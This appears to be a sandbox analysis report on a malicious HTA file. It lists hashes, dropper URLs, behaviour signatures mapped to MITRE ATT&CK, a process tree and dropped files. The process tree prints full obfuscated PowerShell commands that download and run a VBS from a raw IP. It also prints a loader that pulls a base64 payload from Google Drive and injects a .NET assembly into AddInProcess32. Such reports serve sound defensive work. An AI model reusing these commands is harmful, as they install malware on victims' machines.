4e15eab180712f99efe5eea760beea458c7bfc4eeb5f5961b2b5d0c9b7611d3d

General

Target

seethebestthingstobegoodwithhislifebestthigns.hta
Size

130KB
MD5

0b1aa8ae190d05df71f4052fae67df5b
SHA1

f6fe29f3e7830b15e3b244ba83216c029dcb60fb
SHA256

4e15eab180712f99efe5eea760beea458c7bfc4eeb5f5961b2b5d0c9b7611d3d
SHA512

94008a8bf00a1334c16129258243bf89d8351c82ede845fefdb657838fe2f602f761b9935e5fef5e01b368096993f49a48e65d3705cea948d9435db0df370a04
SSDEEP

96:Eam7QSo4DH5wo4DH5rtTRJP4srvjTKP4DH5Sr4DH5NFAb5UAf4DH5G7T:Ea2Rok0RLknYoVT

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

pOweRshEll.eXepowershell.exe

flow pid process

3 2712 pOweRshEll.eXe
6 2780 powershell.exe
8 2780 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2852 powershell.exe
2780 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

pOweRshEll.eXepowershell.exe

pid process

2712 pOweRshEll.eXe
2860 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

6 drive.google.com
5 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
3	2712	pOweRshEll.eXe
6	2780	powershell.exe
8	2780	powershell.exe

pid	process
2852	powershell.exe
2780	powershell.exe

pid	process
2712	pOweRshEll.eXe
2860	powershell.exe

flow	ioc
6	drive.google.com
5	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

csc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exepOweRshEll.eXepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOweRshEll.eXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

pOweRshEll.eXepowershell.exepowershell.exepowershell.exe

pid process

2712 pOweRshEll.eXe
2860 powershell.exe
2712 pOweRshEll.eXe
2712 pOweRshEll.eXe
2852 powershell.exe
2780 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2712	pOweRshEll.eXe
2860	powershell.exe
2712	pOweRshEll.eXe
2712	pOweRshEll.eXe
2852	powershell.exe
2780	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

pOweRshEll.eXepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2712	pOweRshEll.eXe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exepOweRshEll.eXecsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 2088 wrote to memory of 2712	2088	mshta.exe	pOweRshEll.eXe
PID 2088 wrote to memory of 2712	2088	mshta.exe	pOweRshEll.eXe
PID 2088 wrote to memory of 2712	2088	mshta.exe	pOweRshEll.eXe
PID 2088 wrote to memory of 2712	2088	mshta.exe	pOweRshEll.eXe
PID 2712 wrote to memory of 2860	2712	pOweRshEll.eXe	powershell.exe
PID 2712 wrote to memory of 2860	2712	pOweRshEll.eXe	powershell.exe
PID 2712 wrote to memory of 2860	2712	pOweRshEll.eXe	powershell.exe
PID 2712 wrote to memory of 2860	2712	pOweRshEll.eXe	powershell.exe
PID 2712 wrote to memory of 2944	2712	pOweRshEll.eXe	csc.exe
PID 2712 wrote to memory of 2944	2712	pOweRshEll.eXe	csc.exe
PID 2712 wrote to memory of 2944	2712	pOweRshEll.eXe	csc.exe
PID 2712 wrote to memory of 2944	2712	pOweRshEll.eXe	csc.exe
PID 2944 wrote to memory of 2656	2944	csc.exe	cvtres.exe
PID 2944 wrote to memory of 2656	2944	csc.exe	cvtres.exe
PID 2944 wrote to memory of 2656	2944	csc.exe	cvtres.exe
PID 2944 wrote to memory of 2656	2944	csc.exe	cvtres.exe
PID 2712 wrote to memory of 2220	2712	pOweRshEll.eXe	WScript.exe
PID 2712 wrote to memory of 2220	2712	pOweRshEll.eXe	WScript.exe
PID 2712 wrote to memory of 2220	2712	pOweRshEll.eXe	WScript.exe
PID 2712 wrote to memory of 2220	2712	pOweRshEll.eXe	WScript.exe
PID 2220 wrote to memory of 2852	2220	WScript.exe	powershell.exe
PID 2220 wrote to memory of 2852	2220	WScript.exe	powershell.exe
PID 2220 wrote to memory of 2852	2220	WScript.exe	powershell.exe
PID 2220 wrote to memory of 2852	2220	WScript.exe	powershell.exe
PID 2852 wrote to memory of 2780	2852	powershell.exe	powershell.exe
PID 2852 wrote to memory of 2780	2852	powershell.exe	powershell.exe
PID 2852 wrote to memory of 2780	2852	powershell.exe	powershell.exe
PID 2852 wrote to memory of 2780	2852	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingstobegoodwithhislifebestthigns.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2088
- C:\Windows\SysWOW64\WinDOWspOwershElL\v1.0\pOweRshEll.eXe
  "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2860
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k1xpfi4e.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2944
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8EAA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8EA9.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2656
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2220
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2852
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES8EAA.tmp

Filesize
1KB

MD5
ee89a2b97a7bd816ff8563ade1ddd760

SHA1
fb56e5cda64b944e23df4876230293b195cd4281

SHA256
fe6d728128d123baaa2d99f14e48f325bc0e65919771b1342dbb1161a967ea40

SHA512
a028ea2551e4590bf8da11ff4d321c0dd282bada338ada8a850b88ef0163c5ea978d13bac12e3609d3db77a1f0cf027ac7d508c3d4f953721c1579b5ca807ba4

Download Submit
C:\Users\Admin\AppData\Local\Temp\k1xpfi4e.dll

Filesize
3KB

MD5
801ab15e44af193731b3029673640200

SHA1
3174e41d6f6b53c5c187fe4ebf93e97258b3195c

SHA256
ba34a881bd3c4b93b6a0749a1c7b8bd6a683238c09dfdfbde68147a61bf6600a

SHA512
249e4d61860b139bbd7310c51103bbb1f8a0fab6b885ac06be9c3c41afa2ac13f1340af7bbe1f4309eef8c40442595da341a838e34a40cea0b2211071fae827f

Download Submit
C:\Users\Admin\AppData\Local\Temp\k1xpfi4e.pdb

Filesize
7KB

MD5
666b79b613de4b07c2f62fa408bcb8f4

SHA1
72c6767df24ceab9db19ae441d5faabea533274a

SHA256
61f8dde5b31934abe911f84e8c1d0c32d677b1432dc64a22076543d0ddffba15

SHA512
a6e1a4b15985f34b00653f5d844101c633d1419879922fa39c6e9b0c0efe88b3f79899db2219b46090e03bd37e88134dd00c2960a96779e7a7ecbccb11573b05

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
724b90c155d42e7ac698e54e0bfbf327

SHA1
eb4f31fccd6539a0cee22955248ae7826c7117dc

SHA256
2a6a2686a25831a3012b7588ba985716adea7c30be9e694e4e8e86aab548b37f

SHA512
6f30df6522198bfc8d4f420d4e3e9620846f9d0f231654f8edad1803caebe4d1d53c3dcd27ef6f7b2d2e68260e51f6173175133031c17653a28a1f02499f49ea

Download Submit
C:\Users\Admin\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS

Filesize
136KB

MD5
52a69ab69d1c871566791a3c06982607

SHA1
367845c8b76d602680ee6069f3bde95e02c350d9

SHA256
4f6090a3d6a848ae3ef2310caca02976fe8448fc21cbe357f4a28a88f34ead28

SHA512
681b60151ef27726f8b4c9c0949a8962fa8b16fe3583ba5ee4019831b6ac2ad5bf2562da0e8fc55cdec4cb10c59a608896b9be98bedd1a8bbde43b711ee2e0c2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC8EA9.tmp

Filesize
652B

MD5
8a637c9309fbc0c69451d5cbd9fa8ddb

SHA1
6e624f5e5d73eb93c57e1637a5402e1e45577a8d

SHA256
d4adb2da8640a0d9082f27b7877f1657d08e439667f884b9a9b07dd058a702c9

SHA512
c20ad479e85b2cc01482dacd21b4d036a65aed61bac8b6c1398a0f056de4e9e02ad9beeaccdc582e9464ab171ad5afb8b124a8be051ac607d520fc932f76c335

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\k1xpfi4e.0.cs

Filesize
469B

MD5
de4a3e7070e220b427d460a803bf2b1b

SHA1
f59c55466008ca3d557cc114c01395ba724a3a32

SHA256
0652da0455490eaf890ddcbc122a763d5f4031a9b2825d514d105bd8ea142eae

SHA512
afed9ff23e8f788d80f409856741bc68e985eb0092412f91e709d917fc37ea47e43b2560313195e5c0f8facc6232ddd74e5ca38c66d16af31d5f7b4984999b85

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\k1xpfi4e.cmdline

Filesize
309B

MD5
b99f9fb3b9a28389d6d3722cc03a0a0e

SHA1
ee60947c3596e42b2273cbdeb596bf70ef281fac

SHA256
e9788231f8a864fb1c49682c30fa9b55273542be019199a8eea7cba8db748587

SHA512
3fcf7abfe9679021800fe78206b132bb8ba4088648f9d83af1a8a093d1152996ef10e4c52eed901f319b6fb45cfb7ca1c3d7293b1ce722fb3fdb5a68cab940d1

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads